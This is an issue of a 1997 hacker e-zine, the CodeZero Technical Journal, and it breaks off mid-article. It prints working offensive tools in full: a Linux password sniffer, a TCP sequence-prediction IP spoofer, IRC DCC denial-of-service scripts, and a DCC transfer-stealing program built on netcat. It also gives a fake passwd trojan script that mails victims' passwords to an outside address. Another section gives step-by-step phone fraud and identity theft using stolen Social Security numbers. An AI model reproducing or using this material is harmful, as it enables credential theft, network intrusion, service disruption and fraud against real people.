ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ The CodeZero Technical Journal, April 1997, Issue 002 ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± BTW, I use EDIT.COM to view this from DOS, then the ASCII's work. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Official CodeZero Technical Journal Distribution Site ===============> http://www.neonunix.org/codezero/ <===================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Official Sponsor Of The CodeZero Technical Journal ==============> THE CrAckHouSe <=============== --------------> WWW.CRACKHOUSE.COM <--------------- --------------> IRC.CRACKHOUSE.COM <--------------- ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In This Issue : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. The State Of The CodeZero This Month...............: Tetsu Khan 2. A Linux Sniffer....................................: halflife / medulla 3. Telnet Sequencer / IP Spoofer......................: VECT0R-X 4. Free Calls With A Cellular Phone Without Cloning...: TRON 5. Hacking Toasters And Other Electrical Items........: Tetsu Khan 6. IRC DCC Protocol Security Holes....................: James Brown 7. Simple Password Trojan Scripts.....................: Kevin Carter .: 8. The Last Hack Of dk................................: from www.crackhouse.com 9. Department of Defence Server Listing...............: The CodeZero crew 10.Solaris 2.5 Calendar Exploit.......................: Tetsu Khan 11.CodeZero World News................................: fr1day / od^phreak 12.News Conclusion....................................: Testu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. The State Of The CodeZero This Month : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This release is slightly earlier than planned, this is due to the writing I have been doing recently and the feedback I've been getting from issue 1. This month he have been busy gathering news for the world news section, as well as me getting the others to finally submit some work, i also asked on irc if anyone in #cellular, #hack or #unix would like to write articles, if you are interested in writing atricles, then please submit any that you may like to be published in this technical journal to : codezero@digi-gram.com , remember to put your name and details in the body of the message. Many many many many sites have been hacked this month by various individuals, if you hear of any sites that have been hacked, please mail hacked@digi-web.com with your name, the news about the hack, and any other relevant details. CodeZero may release a special edition of the technical journal in conjunction with HBS, or Havoc Bell Services, they are nice people, and each quarter we may release a bumper edition along with Digital Darkness, a name is still being thought up, watch this space! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. A Linux Sniffer : halflife / medulla ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Many people already have this, but if you are one of the few that doesnt, here it is... /* LinSniffer 0.04 halflife@saturn.net medulla@infosoc.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include int openintf(char *); int read_tcp(int); int filter(void); int print_header(void); int print_data(int, char *); char *hostlookup(unsigned long int); void clear_victim(void); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; }ep; struct { unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; int bytes_read; char active; time_t start_time; } victim; struct iphdr *ip; struct tcphdr *tcp; int s; FILE *fp; #define CAPTLEN 512 #define TIMEOUT 30 #define TCPLOG "tcp.log" /********************************************************************* Open a raw socket, set up promiscuous mode, and return a file descripter to be used for reading. Accepts a argument for the device to open, but right now this is not user specifiable. *********************************************************************/ int openintf(char *d) { int fd; struct ifreq ifr; int s; /* open sock_packet connection, protocol 6 (tcp) */ fd=socket(AF_INET, SOCK_PACKET, htons(0x800)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } /* get flags for eth0 */ strcpy(ifr.ifr_name, d); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } /* set promiscuous flag */ ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); return fd; } /******************************************************************* Read a packet, pass it through the filter, and if the filter says it is ok, return the number of bytes read. *******************************************************************/ int read_tcp(int s) { int x; while(1) { x=read(s, (struct etherpacket *)&ep, sizeof(ep)); if(x > 1) { if(filter()==0) continue; x=x-54; if(x < 1) continue; return x; } } } /********************************************************************* Filter packet. If you need to modify the program, this is what you will probably want to modify. It is a simpleminded filter to issolate interesting packets. Returns nonzero if the packet is OK. *********************************************************************/ int filter(void) { int p; p=0; /* if not tcp, chuck it! */ if(ip->protocol != 6) return 0; if(victim.active != 0) if(victim.bytes_read > CAPTLEN) { fprintf(fp, "\n----- [CAPLEN Exceeded]\n"); clear_victim(); return 0; } if(victim.active != 0) if(time(NULL) > (victim.start_time + TIMEOUT)) { fprintf(fp, "\n----- [Timed Out]\n"); clear_victim(); return 0; } /* logging ftp, telnet, pop?, imap2, rlogin, poppasswd */ if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==109) p=1; /* pop2 */ if(ntohs(tcp->dest)==143) p=1; /* imap2 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ if(victim.active == 0) if(p == 1) /* if we got a syn, a good port, and no session is active... */ if(tcp->syn == 1) { victim.saddr=ip->saddr; victim.daddr=ip->daddr; victim.active=1; victim.sport=tcp->source; victim.dport=tcp->dest; victim.bytes_read=0; victim.start_time=time(NULL); print_header(); } /* check if this is the correct session */ if(tcp->dest != victim.dport) return 0; if(tcp->source != victim.sport) return 0; if(ip->saddr != victim.saddr) return 0; if(ip->daddr != victim.daddr) return 0; /* if we got a rst close the session */ if(tcp->rst == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [RST]\n"); clear_victim(); return 0; } /* same for fin */ if(tcp->fin == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [FIN]\n"); clear_victim(); return 0; } /* guess everything is ok */ return 1; } /********************************************************************* This is the header we print when we get a new connection. Just prints important information like src/dst ports and ip addresses *********************************************************************/ int print_header(void) { fprintf(fp, "\n"); fprintf(fp, "%s => ", hostlookup(ip->saddr)); fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest)); } /********************************************************************* This function is basically the code from sunsniffer. It is taken from the PR_DATA macro. The old code wouldnt print control characters which are legal as passwords. Problem reported by snoninja. *********************************************************************/ int print_data(int datalen, char *data) { unsigned char lastc=0; victim.bytes_read = victim.bytes_read + datalen; while(datalen-- > 0) { if(*data < 32) { switch(*data) { case '\0':if((lastc=='\r') || (lastc=='\n') || lastc=='\0') break; case '\r': case '\n':fprintf(fp, "\n : ");break; default:fprintf(fp, "^%c",(*data + 64));break; } } else { if(isprint(*data)) fputc(*data, fp); else fprintf(fp, "(%d)", *data); } lastc=*data++; } fflush(fp); } /********************************************************************* main function. Sets things up, and then goes into a loop. *********************************************************************/ main(int argc, char **argv) { /* open eth0 if possible */ s=openintf("eth0"); ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); /* set signal handlers, ignore sighup, other signals call cleanup() */ signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); /* REAL dumb argument handler. Any argument means write to stdout otherwise we write to tcp.log. This really needs fixing (TODO) */ if(argc == 2) fp=stdout; /* Try to open log file, exit if we cant */ else fp=fopen(TCPLOG, "at"); if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);} /* zero out the victim struct */ clear_victim(); for(;;) { /* read packet */ read_tcp(s); /* if we have a active connection, write data */ if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); /* flush the buffer (this isnt really needed since we do it now in print_data */ fflush(fp); } } /************************************************************************ Look up a ip address and return its hostname if possible. Otherwise just return its ascii ip address. Uses a static buffer that is overwritten by successive calls. ************************************************************************/ char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; /* do a gethostbyaddr() */ he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); /* if that failed, do a inet_ntoa() */ if(he == NULL) strcpy(blah, inet_ntoa(i)); /* copy it to buffer..hmm, should prob use strncpy, eh? */ else strcpy(blah, he->h_name); return blah; } /******************************************************************* Clear the victim structure setting all important fields to 0 *******************************************************************/ void clear_victim(void) { victim.saddr=0; victim.daddr=0; victim.sport=0; victim.dport=0; victim.active=0; victim.bytes_read=0; victim.start_time=0; } /****************************************************************** This is what we do when we are killed (except with kill -9 since we can't trap that signal). ******************************************************************/ void cleanup(int sig) { fprintf(fp, "Exiting...\n"); close(s); fclose(fp); exit(0); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Telnet Sequencer / IP Spoofer : VECT0R-X ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Here is an example of a working linux / solaris telnet spoofer program, again many people may have this already, and this is for those who dont... /* */ /* tELNET SEQUENCER v0.0001 = DEVELOPED BY VECT0R-X */ /* Under Solaris try: */ /* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */ #include "/usr/include/netinet/tcp.h" #include unsigned long sourceport = 1036; unsigned long dest, spoofed, src, nseq, tarport, temp; char str[255], *string; char buf[4096]; char spoofdir[10], *spoofid; char spoofbuf[42]; int len, rec, sen, i=1, adder=128000, stringlen=0; int spooffd, spooflen; struct sockaddr_in addr, spoofedaddr; struct hostent *host; void main(int argc, char *argv[]) { unsigned long fakesequence = 408618+getpid(); sourceport+=getpid(); printf("tELNET SEQUENCEr - Writtin by vect0rx.\n\n"); if (argc != 5) { fprintf(stderr,"Usage: %s {1|2}\n\n",argv[0]); fprintf(stderr," - Site spoof is attempted on.\n"); fprintf(stderr," - Port to access on .\n"); fprintf(stderr," - Host to appear from.\n"); fprintf(stderr," 1 - Offset of 128000 (common).\n"); fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n"); exit(1); } tarport = atoi(argv[2]); if (argv[4][0] == '2') adder=64000; memset(&spoofedaddr,0,sizeof(spoofedaddr)); spoofedaddr.sin_family = AF_INET; if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[3])) == -1) { if ((host = gethostbyname(argv[3])) == NULL) { printf("Unknown host %s.\n",argv[3]); exit(1); } spoofedaddr.sin_family = host->h_addrtype; memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length); } memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4); memset(&addr,0,sizeof(addr)); addr.sin_family = AF_INET; if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) { if ((host = gethostbyname(argv[1])) == NULL) { printf("Unknown host %s.\n",argv[1]); exit(1); } addr.sin_family = host->h_addrtype; memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length); } memcpy(&dest,(char *)&addr.sin_addr.s_addr,4); if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("error: recv socket"); exit(1); } if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: send socket"); exit(1); } sen = openintf("ppp0"); #ifdef IP_HDRINCL fprintf(stderr,"IP_HDRINCL is set\n"); if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #endif gethostname(buf, 128); if ((host=gethostbyname(buf))==NULL) { fprintf(stderr, "Can't get my hostname!?\n"); exit(1); } memcpy(&src,host->h_addr,4); sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport, tarport, fakesequence, 0, NULL, 0); for (;;) { gettcppacket(rec,buf,sizeof(buf)); ip = (struct iphdr *) buf; if (ip->saddr != dest) continue; len = ip->ihl << 2; tcp = (struct tcphdr *) (buf+len); if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) { temp=htonl(tcp->th_seq); nseq=temp; nseq+=adder; printf("Sequence returned is %lu, Offset is %lu\n", nseq, adder); sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport, tarport, fakesequence, 0, NULL, 0); break; /* out of for loop */ } } sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport, tarport,fakesequence,0,NULL,0); printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout); usleep(10000); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport, tarport,++fakesequence,++nseq,NULL,0); printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout); usleep(5000); printf("Sending irc client handshake.\n"); fflush(stdout); strcat(spoofdir, "./telnet.d"); spooffd = open(spoofdir, O_RDONLY); if (spooffd < 0) { perror("open: "); exit(0); } else { spooflen = read(spooffd, spoofbuf, sizeof(spoofbuf)); spoofid = strtok(spoofbuf, "\r\n"); } stringlen = strlen(spoofid); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,spoofid,stringlen); fakesequence+=stringlen; for(;;) { printf("telnet:%s> ", argv[1]); fflush(stdout); string = fgets(str, 255, stdin); stringlen = strlen(string); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,string,stringlen); fakesequence+=stringlen; } } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. Free Calls With A Cellular Phone Without Cloning : TRON ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ There are several ways to make free calls with a cellular phone that does not have service with the hassle of cloning it, or if you have a phone that can't be cloned or you don't want to buy the expensive equipment required, so here are a few ways to do it from home with little risk... 1.) American Roaming Network. ----------------------------- To reach the American Roaming Network (or something like it, depending on where you are), put your phone on the alternate carrier side so it says roam, then dial 0 and it should tell you your call is being forwarded. At that point you should be connected to an automated system, form here you have a couple of billing options... To use a credit or calling card, you enter the area code and number you want to call; for a calling card you then enter the card number and pin, for a credit card you then enter the card number and expirarion date, then the zip code of the billing address. ARN takes MasterCard, American Express, and most local and long distance company calling cards. They say they dont take VISA anymore, but I've gotten them to work on the automated system. If the number you call is busy or doesn't answer, you can press * and then either leave a message that the system will deliver, or try another number. If you want to dial another number you will have to put the zip code again after the new number. You can also make collect and 3rd party billed calls by dialing 0 instead of the number to call when you connect to ARN. You will be sent to an operator, tell them you would like to place a call. They will then ask how you would like to bill it. You can set up a local dialup voice mail box and change the greeting so it sounds like someone's there to accept the charges, the operator has to read a script, so you have to adjust the timing to get it just right. ARN will not 3rd party or collect bill to 800 numbers, nor will they place calls to 800 numbers charged to 3rd party numbers. 2.) Social Engineering. ----------------------- Another way is to dial 611 and tell the customer support person that you're having trouble getting through to the area you're trying yo call and could they try place the call for you. This works about 50% of the time, it helps to have the name and cell number of someone who has service with that provider in case they ask for it, they might ask for the social security number too, so be prepared, dumpster diving at a cell store is the easiest place to get that info. 3.) Set Up Service With Someone Else's Info. -------------------------------------------- The best way, and the one I prefer to cloning, is to get someone else's information and set up service. The best place to get the information you'll need is from a place that does credit checks, like a bank or car dealership. Make sure they have a good rating, like A, B or C, then you wont be asked for a deposit. You'll need a name, address, social security number, drivers license number and work number. You will also need a cell phone that is not stolen. They will not activate a stolen phone, when I tried they put me on hold and called the person who's phone I had and then told me the person wanted me to mail the phone back to them. Also find and write down the electronic serial number, you'll need that too. You then need to call a local cell service provider (ie. GTE MobilNet, Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell you about the different service plans and pick one. They will then ask for your "information" and ESN. Then they will ask to call you back with your new cell number, tell them that you're out and ask for a number to call them back at, they will have no problem with this. Then call them back and they will tell you how to program your new number into your phone, they might also tell you how to program in a new system ID and pagin channel etc, this is no big deal. Also ask when the billing cycle ends and when the bill is sent out, you will want to stop using this number when the person you're billing it to gets their bill. Be sure to get call features like 3-way and call forwarding, they're always useful to have. I prefer this to cloning because its less worry and hassle and it lasts up to a month. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. Hacking Toasters And Other Electrical Items : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* This text covers the basics of hacking the Proctor & Silex MoDEL:0342 SERiES:c930 TyPe:b This specific toaster handels 120 Volts A.C. *ONLY* 1400 WATTS */ SKaNNinG Da PoRtZ: ------------------ YeW cAn SCan FoR HiDDeN pOrTs bY dEwIn' ThE FoLLoWing.., 1: LewK FoR hIddEn PoRtS aT ThE ReAr Of tHE ToAsTer. 2: TrY To FiNd bAckDooRz On The OuTSiDe Of ThE ToAstER. If yOU LokAtE SuCh A hIdDen PorT, YeW Can ATtemPt To coNNecT tO iT... CoNNECTiNG: ----------- When CoNNECTiNG TeW SuCH A ToaSTER On a hIddEn PoRt YeW WiLL b ProMPtED 4 aH LoGiN AnD PaSSwErD. eG:(This is a capture of a login.) +-------------------+ | PROCTOR & SILEX | | M:0225 | | S:b4588 | | T:02 | +-------------------+ TOasTeR OS RelEasE 1.02 (ToAsT) login: bAGeL password: <--- We AttEmPtid "toaster" L0ghINn GRaNTiD *************** ------------------------------------------------------------ WeLKoMe To TOaSty LaNd! ------------------------------------------------------------ login on tty[tOaST] last login from ChEEz_ToAsT.COM on tty[BaGeL] at 6:43a.m. :/etc/motd not found 1: OFF 2: ToAsT StART 3: BRoWN 4: BuRNT 5: LiGHT 6: UNiX TyPE SheLL ENViRONMEnT If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe No. SiX. AND RuN NE Of ThU 8LGMz. They WeRK. DeW NoT WeRRIE BoUT WhUT THU 8lgM SaYZ iT WiLL STiLL WeRK oN ThIS SYSTEM. AlLLL THu 8LGMz DeW()#*%&( ThE OtHER CoMMANDs R NoT ImPOrTaNT. SoME NeaT-O ThINGS. YeW CaN TaP the /dev/ToaST-N-CheEZe. YeW CaN FiND A FeW PRoGRAMs ThAT ArE GeWD FeR ThIS SuCH SYTeMM. % ftp ftp.gimme.leet.juarez.codezero.com /pub/hax0ring_WaReZ/ToAsteR_HaxoRiNG_WaREZ P&S_ToAsTeR_ReWTKiT.TaR.GZ -RooTKiT FeR ThiS TYPE oF ToaSTER PSNiFF.GZ -/dev/ToasT-N-CheEZe SniFFAH SoME DeFULtZ OfTen FoUnD oN SuCH ToAstErz: ------------------------------------------ l : bageL-n-KreAM/CheZE p : YuMMY l : PoPALeNDER p : STiNKY_Joo l : POaCHeD_EGZ p : HooKGNOZe l : root p : root l : lpd p : lpd l : guest p : hymienotyew eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe! T_K ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6. IRC DCC Protocol Security Holes : James Brown ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ DCC is the IRC client-side protocol used to send information directly between clients. Normally, when a message is sent between 2 users, it goes from the user's client to the irc server that client is connected to, then to the server the reciever is connected to, and finally to the user. Obviously that is a lot of wasted bandwidth compared to sending information directly between two clients, thus DCC is used. DCC is among the simplest of setups for communication, consisting merely of a tcp connection between two computers, across which data is passed. Since error correction, flow control, etc. are already handled by the tcp protocol, there is no need to worry about any such issues. When you initiate a dcc send, a number of things happen: 1. Your irc client opens an unpriviledged tcp port (>1024), and listens for an incoming connection. 2. Your irc client sends: A) The file name B) Your ip address C) The number of the tcp port it is listening on D) The size of the file you are sending (in bytes) 3. The remote irc client then opens a tcp connection to the specified ip address, transmits a bit of garbage to initiate the transfer, and dumps whatever is sent over that tcp port to a file. 4. At the time the first connection to the tcp port is established, your irc client stops listening for new connections, and dumps the file over the now-established tcp connection. What you can do with this: -------------------------- The simplest uses of this setup are denial-of-service attacks. Some IRC clients (ircII earlier than 2.8.2 and Homer) hang while trying to establish a dcc connection. Thus, by placing the ip address of a nonexistant machine in your dcc send request, you can cause the irc client of a user who chose to get the file to hang long enough to cause a ping timeout. (Note for readability, the actual control characters in this script have been replaced with ascii representations, to actually execute convert accordingly). dcckill.irc: echo Loading DCC KILL echo Syntax: DCCK nick filename size echo ^Bfilename^B and ^Bsize^B are bogus values. alias DCCK { ^assign dcc_killing 0 //quote PRIVMSG $0 :^ADCC SEND $1 12341234 4321 $2^A echo *** Sent DCC KILL request to $0 ^assign dcc_killing 1 } A similar trick, less damaging, but quite capable of confusing the hell out of a lot of people is to direct remote irc clients to connect to the chargen port of some machine on a T3. (Note that ircII will not connect to a priviliged port, although all of the GUI clients I have tested will) You can thus use somebody else's bandwidth to dump garbage to a remote machine. dccchargen.irc: echo Loading DCC CHARGEN echo Syntax: DCCCHARGEN nick filename size echo ^Bfilename^B and ^Bsize^B are bogus values. alias DCCCHARGEN { ^assign dcc_charging 0 //quote PRIVMSG $0 :^ADCC SEND $1 2230084270 19 $2^A echo *** Sent DCC CHARGEN request to $0 ^assign dcc_charging 1 } Aside from denial of service attacks, the primary interesting thing you can do is intercept dcc file transfers. Becuase ircII listens for incoming connections from ANY machine when you do a dcc send, all that is needed is to open a tcp connection to the appropriate port (using netcat for example), dump a few garbage characters to initiate the transfer, and then store whatever comes across the tcp connection in a file. You lose the filename, but for those who are willing to take a hex editor to the first few bytes of what they get, figuring out what the file format is should be no problem. The simplest way to determine which port a dcc transfer is going to be on is if you have user access on the machine. If you watch for new listens on ephemeral ports (using netstat or equivalent), you can then quickly open them, before the actual recipient has a chance to do so. Here is a quick linux-only program to parse the output of netstat -a, and dump the contents of whatever dcc sends start from the local machine to a file. dccgrab.c: /* dccgrab 0.01 */ /* A quick program to intercept dcc sends. */ /* Obviously, don't use this without appropriate permission. */ /* Requires that a copy of netcat be in the path, and a copy of */ /* netcat's telnet.d file needs to be in the current directoyr */ /* output will be written to snagfile */ /* known bugs: Bot detection should be improved */ /* Only works with linux netstat */ #include #include #define TRUE 1 #define FALSE 0 int main (){ int SnaggedOne; FILE *f; char NetstatLine [1024]; char CommandString [1024]; char *colin = ":"; char *tempstr; int port; int i; port=1; SnaggedOne=FALSE; while (!SnaggedOne){ system ("netstat -a |egrep LISTEN |egrep ':' >/tmp/.dcc2345"); f=fopen ("/tmp/.dcc2345","rt"); if (f==NULL) { fprintf (stderr,"Unable to open file!"); exit (1); } port =0; while (port == 0) { fgets (&NetstatLine[0],1024,f); tempstr = strstr (&NetstatLine[0],colin); tempstr += sizeof (char); sscanf (tempstr,"%d ",&port); /* let's deal with ports we don't want to touch */ if (port < 1024) /* priviledged */ port=0; if (port == 6000) /* X */ port=0; if (port == 8080) /* proxy servers */ port=0; /* bots... */ if (port == 2222) port=0; if (port == 3333) port=0; if (port == 4444) port=0; if (port == 5555) port=0; if (port == 6666) port=0; if (port == 7777) port=0; if (port == 8888) port=0; if (port == 9999) port=0; if (feof (f)) port=-1; } fclose (f); if (port >0) { SnaggedOne=TRUE; printf ("snagging something from port %d\n",port); sprintf (&CommandString[0],"nc 127.0.0.1 %d < ./telnet.d > snagfile",port); system (CommandString); } else sleep (1); } /* while !snaggedone*/ return 0; } This is obviously not the optimal solution for stealing dcc transfers, and only works locally, but it provides a good basis for working on your own code to improve upon. If you can determine which port the kernel on a remote system assigned last, you stand a good chance at guessing the port number for the next dcc send, simply because most kernels assign tcp ports in increasing order. Thus, if you can get a bot to dcc chat you, and you record the port number, and then bombard the next 30 or so tcp ports with attempted connections, you stand a very good chance at getting the next file that that bot happens to send somebody. Actual implementation of this is left as an exercise to you. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 7. Simple Password Trojan Scripts : Kevin Carter ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Here I will be presenting two scripts, (more of an idea really)... That you may use to get passwords from people's accounts you are using via rlogin... I am not a super script writer, and that is why I present it as more of an idea, with an example or two... If you get on someones account, you may want to hide this file, for this example we will assume it is named ".hiddenf"... So you could put this in the users home directory, and then add to the users .login an alias for "/bin/passwd/" and "passwd", with "$HOME/.hiddenf" being run instead, so that anytime after that, when they try to change their password, they will really run the script... This script never erases it itself, because then you would never get the NEW password... Script 001 : ------------ #!/bin/tcsh echo -n "Changing password for $USER on " hostname echo -n "Old password: " stty -echo echo $<>$HOME/.tym stty echo echo "" mail me@my.anon.mail.service.org<$HOME/.tym rm $HOME/.tym echo echo "Sorry." Now this next script is a bit different, in that it prompts for both old and new passwords, and then gives an 'error' of "Incorrect Password"... and erases itself... With this you would sort of have to hope the user chooses the same "New Password" the second time it is run.. (The real passwd binary that is)... When 'installing' this you would probably once again want to hide 